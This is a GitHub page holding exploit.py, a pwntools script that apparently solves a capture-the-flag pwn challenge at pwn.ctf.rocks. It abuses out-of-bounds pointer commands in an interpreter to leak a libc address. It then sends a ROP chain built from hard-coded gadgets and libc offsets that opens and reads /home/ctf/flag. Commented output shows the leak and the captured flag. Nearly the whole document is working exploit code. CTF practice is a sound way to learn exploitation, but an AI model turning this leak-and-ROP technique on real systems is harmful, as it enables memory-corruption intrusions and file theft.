-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit.py
85 lines (66 loc) · 1.6 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
from pwn import *
def movPtr(offset):
if offset > 0:
return "!>"*offset
elif offset < 0:
return "!<"*abs(offset)
def putchar():
return "!:"
def puts(size):
s = ""
for i in range(size):
s += putchar() + movPtr(1)
return s
def write(n):
s = ""
for i in range(n):
s += "!." + movPtr(1)
return s
#Gadgets
POP_RDI = 0x400e93
POP_RSI_POP_R15 = 0x400e91
ROP_CHAIN_SIZE = 200
RET_ADDRESS_OFFSET = 520
BSS_ADDR = 0x6020E0
r = remote("pwn.ctf.rocks", 31337)
code = movPtr(RET_ADDRESS_OFFSET)
code += puts(8) #leak libc
code += movPtr(-8) #reset ptr
code += write(ROP_CHAIN_SIZE)
r.recvuntil("code:")
r.sendline(code)
s = r.recvuntil("\x00")
libcMainAddr = u64(s.ljust(8, "\x00"))
info("Leak: libc_start_main+240 %s" % hex(libcMainAddr))
openAddr = libcMainAddr + 875552
readAddr = libcMainAddr + 876096
getsAddr = libcMainAddr + 320848
putsAddr = 0x400DF6
#Rop chain
rop = p64(POP_RDI)
rop += p64(BSS_ADDR)
rop += p64(getsAddr)
rop += p64(POP_RDI)
rop += p64(BSS_ADDR)
rop += p64(POP_RSI_POP_R15)
rop += p64(0x0) + p64(0xdeadbeef)
rop += p64(openAddr)
rop += p64(POP_RDI)
rop += p64(3)
rop += p64(POP_RSI_POP_R15)
rop += p64(BSS_ADDR)
rop += p64(0xdeadbeef)
rop += p64(readAddr)
rop += p64(POP_RDI)
rop += p64(BSS_ADDR)
rop += p64(putsAddr)
r.send(rop.ljust(ROP_CHAIN_SIZE, "A"))
r.recvuntil("RTFM!\n")
r.sendline("/home/ctf/flag")
s = r.recvline()
info("Got flag! %s" % s[:s.find("}")+1])
r.close()
#[+] Opening connection to pwn.ctf.rocks on port 31337: Done
#[*] Leak: libc_start_main+240 0x7fb2c3ce0830
#[*] Got flag! SCTF{0uT_oF_BoUNdZ_out_0F_c0ntr0lzZz}
#[*] Closed connection to pwn.ctf.rocks port 31337